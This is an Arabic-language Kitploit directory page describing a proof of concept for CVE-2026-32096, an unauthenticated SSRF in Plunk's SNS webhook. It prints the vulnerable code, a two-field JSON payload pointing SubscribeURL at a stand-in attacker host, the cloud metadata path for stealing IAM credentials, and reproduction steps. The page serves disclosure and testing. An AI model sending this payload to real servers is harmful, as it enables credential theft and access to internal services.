Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/andrebhu/cve-2026-32096
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

إثبات مفهوم لاستغلال ثغرة SSRF في خطاف الويب SNS الخاص بـ Plunk، يوضح تزوير الطلبات من جانب الخادم دون مصادقة عبر SubscribeURL غير مُتحقق منه.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-32096

SSRF عبر SubscriptionConfirmation غير مُتحقق منه في AWS SNS في useplunk/plunk

الملخص

نقطة نهاية Plunk API POST /webhooks/sns تجلب SubscribeURL المقدَّم من المهاجم دون التحقق من التوقيع التشفيري لـ AWS SNS. يمكن لمهاجم غير مُصادَق أن يُجبر الخادم على إجراء طلبات HTTP صادرة عشوائية (SSRF).

الخطورةحرجة — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: تزوير الطلبات من جانب الخادم
الملف المتأثرapps/api/src/controllers/Webhooks.ts
المصادقة المطلوبةلا شيء

الكود القابل للاستغلال

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — لا يوجد تحقق من التوقيع
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

الحد الأدنى من الحمولة هو حقلان فقط:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

التأثير

  • AWS EC2/ECS: سرقة بيانات اعتماد IAM عبر http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • الخدمات الداخلية: الوصول إلى قواعد البيانات، Redis، Kubernetes API، أو خدمات أخرى غير معرّضة للإنترنت
  • فحص المنافذ: تعداد المنافذ الداخلية عبر الاستجابات المستندة إلى التوقيت والأخطاء

إعادة الإنتاج

المتطلبات الأساسية

  • Docker و Docker Compose
  • Python 3

الخطوات

  1. ابدأ بيئة اختبار Plunk:

    root@kitploit:~
    docker compose up -d
    
  2. ابدأ مستمع استدعاء SSRF:

    root@kitploit:~
    python3 listener.py
    
  3. شغّل الاستغلال:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. لاحظ وصول الاستدعاء في مخرجات listener.py، مما يؤكد أن الخادم جلب عنوان URL المُتحكَّم به من المهاجم.

الملفات

الملفالوصف
exploit.shسكربت استغلال شامل — يرسل حمولة SNS مزوّرة إلى نقطة النهاية القابلة للاستغلال
listener.pyمستمع استدعاء SSRF — يلتقط ويسجّل الطلبات الواردة من خادم Plunk
docker-compose.ymlبيئة Docker Compose مصغّرة (Postgres، Redis، Plunk) لإعادة الإنتاج محليًا

المراجع

  • AWS SNS: التحقق من توقيعات رسائل Amazon SNS
  • ورقة الغش الخاصة بمنع SSRF من OWASP
تنزيل الأداة